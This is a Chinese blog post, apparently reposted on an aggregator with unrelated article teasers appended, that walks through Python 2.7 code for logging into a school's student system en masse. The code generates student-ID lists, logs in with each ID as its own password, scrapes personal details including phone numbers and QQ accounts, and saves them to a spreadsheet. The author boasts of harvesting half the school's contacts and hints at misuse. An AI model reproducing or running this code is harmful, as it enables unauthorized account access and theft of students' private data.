爬蟲實在是太好玩了！看我是如何獲取整個學校的學生call和qq！

阿新 • • 發佈：2018-06-09

beautiful xlrd 結束使用 com 指定 https 很好 install

爬蟲開始前的準備：

python2.7
庫文件（xlwt，urllib2，BeautifulSoup4，xlrd）

安裝庫文件的方法：

最好在你的python2.7/script/下面打開power shell(可以shift+右擊) 執行下面的：

安裝庫文件：

pip install *** ***是指上面的庫文件，下面不一定都用，只要上面的，以後出什麽錯，你就繼續pip install

如何查看自己已經安裝了的庫

pip list

觀察網站結構（密碼規則）：

密碼規則

首先這個規則是針對大二和已經畢業了的
密碼規則沒有添加驗證碼（其實添加驗證碼也沒什麽用，只是添加了爬取門檻）

規則是用戶名==密碼
符合條件

user_info

這裏的用戶信息
不要在意這些細節（馬賽克）朦朧美一直是我的追求

sys.setdefaultencoding("utf-8")
# ssl這個是驗證證書 https
ssl._create_default_https_context = ssl._create_unverified_context
# 生成一個存儲cookie的對象
c = cookielib.LWPCookieJar()
cookie = urllib2.HTTPCookieProcessor(c)
opener = urllib2.build_opener(cookie)
urllib2.install_opener(opener)

學號的列表

不要在意我是怎麽知道的，

重要的是這些規則，你怎麽去重新寫一個函數代入

（裏面的我修改過，所以不要套用，以免浪費時間）

# 學號只在最後3位不一樣，隨機數xrange（） 可以處理更好的處理大的列表
def user_id():
 list_1 = []
 for i in xrange(101,249):
 list_1.append(‘1131050‘+str(i))
 for i in xrange(301,349):
 list_1.append(‘1131050‘+ str(i))
 for i in xrange(401,448):
 list_1.append(‘1131050‘+ str(i))
 for i in xrange(501,548):
 list_1.append(‘1131050‘+ str(i))
 for i in xrange(101,150):
 list_1.append(‘1131070‘+ str(i))
 for i in xrange(101,151):
 list_1.append(‘1131050‘+ str(i))
 for i in xrange(201,252):
 list_1.append(‘1135050‘+ str(i))
 for i in xrange(301,352):
 list_1.append(‘1131050‘+ str(i))
 for i in xrange(401,453):
 list_1.append(‘1131050‘+ str(i))
 for i in xrange(101,148):
 list_1.append(‘1131070‘+ str(i))
 for i in xrange(201,247):
 list_1.append(‘1131070‘+ str(i))
 return list_1

用戶信息的獲取

這裏用的的是beautifulsoup庫

def user_info():
 url_info="http://XXX.xxxx.edu.cn:80/Modile/Sys/Meddage/Info.aspx"
 html2 = opener.open(url_info).read()
 
 # python2.7 沒裝lxml的可能會報錯，pip install lxml
 
 soup = BeautifulSoup(html2,"lxml") #以lxml 方式解析抓下來的lxml
 infos = soup.select("tr > td > span") # css seletor 來獲取指定標簽
 #print profes
 # print infos
 return infos

寫入xls(這個是思路)測試用的函數

因為在寫的時候因為編碼問題，不能寫入中文

def write_user():
 file2 = xlwt.Workbook(encoding=‘utf-8‘) #打開一個excel,並且編碼格式以 ‘utf-8‘
 table = file2.add_sheet(‘info‘,cell_overwrite_ok=True) #添加一個表
 table.write(0,0,"15d中文3s0") # 寫入內容，table.write(row,col,‘value‘)
 file2.save(‘file2.xls‘)

開始行動：
添加上延遲訪問： time.sleep(1)

因為爬蟲訪問的不和人一樣，訪問會很快，
這樣可以避免被封ip 還有避免給站點帶來不好的影響

def go_user():
 user_list = []
 user_infos = []
 user_list = user_id()
 file2 = xlwt.Workbook(encoding=‘utf-8‘)
 table = file2.add_sheet(‘info‘,cell_overwrite_ok=True)
 r = 0 #row 行
 for i in user_list:
 c = 0 #col
 login(username=i, password=i) #登錄，並傳入列表的學號
 user_infos = user_info() #獲取學號信息，格式是字典
 for i in user_infos[0:10]: #寫入表單中，循環把信息寫進去
 # print i.get_text()
 table.write(r,c,i.get_text())
 c += 1
 r += 1
 time.sleep(1) #延遲訪問，可避免封ip，還有影響服務器
 print r,c
 file2.save(‘file2.xls‘)

程序執行結束：

部分截圖：有圖有真相，避免無知的噴子

學號規則很好找的，這樣就獲取半個學校的call和qq啦，至於能幹嘛，自己腦補。。。

end_info

不知道庫的使用方法，我這裏總結了下，還有不知道的只能百度啦

是不是很強勢？有沒有很裝逼？哈哈哈！

進群：125240963 即可獲取源碼！

爬蟲實在是太好玩了！看我是如何獲取整個學校的學生call和qq！

beautiful xlrd 結束使用 com 指定 https 很好 install 爬蟲開始前的準備： python2.7 庫文件（xlwt，urllib2，BeautifulSoup4，xlrd）安裝庫文件的方法：最好在你的python2.7/scr

爬蟲老是被封IP？看我大Python搭建高匿代理池！封IP你覺得可能嗎

0x01 寫在前面常聽到很多人抱怨自己的IP因爬蟲次數太多而被網站遮蔽，不得不頻繁使用各種代理IP，卻又因為網上的公開代理大部分都是不能使用，而又要花錢花精力去申請VIP代理，幾番波折又遭遮蔽。特此寫一篇如何利用Python搭建代理池的文章，以降低時間及精力成本，實現自動化獲

Java EE專案中的異常處理 (實在寫的太好了，導致我非法轉載！！！)

為什麼要在J2EE專案中談異常處理呢？可能許多java初學者都想說：“異常處理不就是try….catch…finally嗎？這誰都會啊！”。筆者在初學java時也是這樣認為的。如何在一個多層的j2ee專案中定義相應的異常類？在專案中的每一層如何進行異常處理？異常何時被丟擲

3.網上解決org.apache.commons.lang.xwork.StringUtils的方法都弱爆了，看我怎麼解決它！

網上解決org.apache.commons.lang.xwork.StringUtils的方法都弱爆了，看我怎麼解決它！

關於單點登入原理與簡單實現，寫的太好了一看就懂！

一、單系統登入機制1、http無狀態協議web應用採用browser/server架構，http

女朋友看了我的部落格，說太LOW了，於是我搞了一天~

持續原創輸出，點選上方藍字關注我原創部落格+1，點選左下角閱讀原文進入目錄前言如何下載？配置檔案的分類基本資訊配置修改主題Next主題樣式設定新增動態背景修改連結的樣式新增文章搜尋功能修改文章底部標籤的#的樣式修改作者頭像並旋轉修改``的樣式新增全文閱讀的按鈕新增站點訪問人數計數去掉文章目錄標

雙十一，作為老使用者看我怎麼優雅的薅阿里雲羊毛！

阿里雲雙11活動，我一分錢沒花，白得了199元現金！從阿里雲官方網站進入看到，今年阿里雲不走滿返、滿減路線了，開啟了一個大型拼團活動。雲伺服器99.5元，歷史新低啊。開團組團拉新分200萬紅包，最後百團大戰再分100萬紅包。我今年是這麼薅的，先開了一個團，

電腦C盤快滿了，你就重灌系統？別犯傻了，看我三分鐘搞定（值得收藏備用）

隨著電腦使用時間的增長，突然有一天看到電腦C盤“紅了”或者所剩空間已不多，這就會對電腦的執行速度產生影響了，特別是做技術的，這種情況更是經常碰到，如下圖所示。此時若只是清理快取，只能暫時緩解，不能從根本上解決問題。這時有兩種方法：一是重灌系統，為C盤分配更大的容量，但是這種方

百度的反爬機制很容易破解的！你看我三分鐘解決他的反爬！

這篇文章的主要目的還是破解JS引數加密，百度翻譯的JS過程並不是很複雜，非常適合新手練手。首先，開啟百度翻譯，隨便輸點詞語，點選翻譯。百度的反爬機制很容易破解的！你看我三分鐘解決他的反爬！進群進群：943752371可以獲取Python各類入門學習資料！這是我的微信公眾

學了java，我才發現檯球還可以這樣玩！

桌球小遊戲的嘗試桌球是人們日常生活中都能接觸到的一種娛樂活動，隨著網際網路技術的發展，手機上也有了很多桌球小遊戲，讓人們隨時隨地都能打兩把。今天分享一個用java編寫的桌球小遊戲程式碼如下： import java.awt.*; import javax.

嘿嘿，我就知道面試官接下來要問我 ConcurrentHashMap 底層原理了，看我怎麼秀他

前言上篇文章介紹了 HashMap 原始碼後，在部落格平臺廣受好評，讓本來己經不打算更新這個系列的我，彷彿被打了一頓雞血。真的，被讀者認可的感覺，就是這麼奇妙。然後，有讀者希望我能出一版 ConcurrentHashMap 的解析。所以，今天的這篇文章，我準備講述一下 ConcurrentHashMa

黑馬程式設計師—感謝黑馬給予30歲的我，換行業的勇氣和平臺！！！

也許你會擔心工作有了，那工作應付不了怎麼辦？現在來看這種擔心有點多餘，所有工作中用到的東西我們都學習過，很多在企業中難以解決的問題，我們都有老師的視訊，即使工作中用到了，你當時沒學好，那就回家好好補習吧。如果這樣還是不行，那我們是不是要投降了？錯了，我們還有黑馬這個團隊，你所有的同學，所有的老師，還有

選修課有很多有趣的！用Python模擬登入學校教務系統搶課！

最近學校開始選課，但是如果選課時間與自己的事情衝突，這時候就可以使用Python指令碼自助搶課，搶課的第一步即是模擬登入，需要模擬登入後儲存登入資訊然後再進行操作。把css 圖片之類的過濾掉，發現了default.aspx這個東西如果你們學校教務系統不使用Cookie則會是這

國珍竹珍沐浴露14大神奇功能，太強大了，必看！

產生 alt 創業平臺如何選擇營銷卡住有時分享健康潤滑拉鏈假如某天你穿褲子突然覺得拉鏈拉不上去，卡卡的，這時你老婆直接在你拉鏈上擠點沐浴露，請不要誤會，好麽？這只是因為拉鏈卡住了，滴一滴竹珍沐浴露到卡住的位置再拉，問題就解決了。潤滑剃須

自從會了這招，我就再也不擔心我的爬蟲會被封了！搭建Cookies池

detail http containe TP bad pst pro ear tip 但是，這個接口在沒有登錄的情況下會有請求頻率檢測。如果一段時間內訪問太過頻繁，比如打開這個鏈接，一直不斷刷新，則會看到請求頻率過高的提示，如下圖所示。一、本

零基礎轉行大資料工程師艱辛歷程記！看了讓我感慨萬千

我們相信人人都可以成為一個大資料程式設計師，現在開始，找個師兄，帶你入門，學習的路上不再迷茫。不少想進入大資料行業的零基礎學員經常會有這樣一些疑問：零基礎應該怎麼學習？自己適合學習大資料嗎？人生，就是在不斷地做選擇，然後在這個選

程式設計師因太漂亮了公司不敢招？網友：都看你去了哪還會看程式碼啊！

身體髮膚，授之父母，我們長相都是與生俱來的，是父母給的，沒法改變。有些職業因為它的特殊性，隊員外貌有一定的要求，但程式設計師這種與外貌無太大關係的職業居然有天會因為長得太好看了被拒絕，這是什麼鬼？對於IT界的稀罕生物“程式媛”，找一份工作我想應該會有很多公司收的。不過也確實

十大經典排序演算法動畫，看我就夠了！

點選上方“程式人生”，選擇“置頂公眾號” 第一時間關注程式猿（媛）身邊的故事圖片源自：モブサイコ100 作者程式設計師小吳如需轉載，請聯絡我們。在前面的章節中詳細的講解分析了十大經典排序演算法，本文將進行一個大總結。 Tip&n

十大經典排序算法動畫與解析，看我就夠了！（配代碼完全版）

實現 insert 個數 while ets 函數 cep lec nbsp GitHub Repo：Sort Article Follow: MisterBooo · GitHub 排序算法是《數據結構與算法》中最基本的算法之一。排序算法可以分為內部排序和

十大經典排序演算法動畫與解析，看我就夠了！（配程式碼完全版）

GitHub Repo：Sort Article Follow: MisterBooo · GitHub 排序演算法是《資料結構與演算法》中最基本的演算法之一。排序演算法可以分為內部排序和外部排序。內部排序是資料記錄在記憶體中進行排序。而外部排序是因排序的資料很大，一次不能容納全部的排

爬蟲實在是太好玩了！看我是如何獲取整個學校的學生call和qq！

相關推薦